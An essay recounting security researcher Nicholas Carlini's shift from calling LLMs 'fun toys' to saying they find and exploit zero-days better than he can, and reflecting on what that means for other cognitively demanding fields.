Fun Toys

Nicholas Carlini is a security researcher at Anthropic. Before that he was at Google DeepMind. He’s been finding ways to break neural networks since his mid-twenties, when he published attacks that hid voice commands inside white noise, tricking voice assistants while their owners heard nothing. His 2017 paper with David Wagner became one of the standard references for adversarial attacks on machine learning systems. He’s the kind of person whose career is built on proving that things people trust are less secure than they think.

Here he is in March 2025, writing about the position he’d held on large language models for years:

These models are fun toys to play around with, but have no practical real world utility. I studied them as toy research objects which might be useful for individual specific tasks like sentiment analysis or translation, but never as general purpose technologies.

I didn’t believe in the applications of LLMs because it seemed obvious to me that training on next token prediction wasn’t going to be able to give you coherent responses across more than a few paragraphs. And I was fairly certain that next-token prediction (1) wouldn’t get the model to build some kind of internal world model, and therefore (2) would cap out at just being some simple statistical next token predictor.

Oh, that 540 billion parameter model can explain jokes? That’s cute; tell me when it can do something useful.

That’s from his blog post “My Thoughts on the Future of ‘AI’”, where he lays out years of quiet scepticism and then says plainly: “I was wrong. I have changed my mind.”

What followed was a year of increasingly urgent public appearances. A FORC keynote at Stanford in June 2025, “How LLMs could enable harm at scale”, where he walked through how attackers could weaponise models for fraud and exploitation. A COLM keynote in October, “Are the harms and risks of LLMs worth it?”, where he weighed the benefits of the technology against its costs and refused to declare a winner. Each talk a step further from “fun toys”, and more concrete about what was coming.

And then last week he gave a talk at Anthropic’s [un]prompted conference called “Black-hat LLMs”, and it wasn’t theoretical anymore. He demoed Claude finding zero-day vulnerabilities live on stage. A blind SQL injection in Ghost that allowed unauthenticated database reads. A heap buffer overflow in the Linux kernel’s NFSv4 daemon that had been sitting there since 2003, missed by human auditors and fuzzers alike.

His summary slide:

LLMs can autonomously, and without fancy scaffolding, find and exploit 0days in critical software. And they are getting good scarily fast.

On a podcast recorded around the same time, he put it more personally:

I said the models are better vulnerability researchers than me. It’s not the case that if you gave the model a very small piece of code that was self-contained and 300 lines long and I could reason and it could reason the same amount of time on that piece of code, I would win. I’m still more intelligent than the model, but what I can’t do is analyze literally every program or every C file in the entire Linux kernel and try to find bugs.

“Fun toys” to “better vulnerability researchers than me” in under two years, from someone whose career was built on being one of the best in the world at exactly this.

The thing that struck me watching the talk wasn’t the security angle on its own. It’s that Carlini’s field is one field. He was paying attention, and he had the expertise to benchmark what the models could do against what he could do himself, and the answer was: more, faster, cheaper. Someone in every cognitively demanding field is about to have that moment, or already has and hasn’t said it out loud yet.

Carlini’s boss seems to agree. Dario Amodei has been on a press tour this year warning that entry-level white-collar work faces serious disruption within one to five years. He’s the CEO of the company that built the model that outperformed his own security researcher, and it would be easy to dismiss that as marketing if the researcher in question hadn’t just demonstrated it on stage.

When they asked Carlini about the long-term outlook during the Q&A, he said defenders probably win eventually. Rewrite things in Rust, kill memory bugs, formally verify protocols. But he compared the transition to the Industrial Revolution: good endgame, brutal ride. The question nobody in that room could answer is how long the ride takes and who gets thrown off.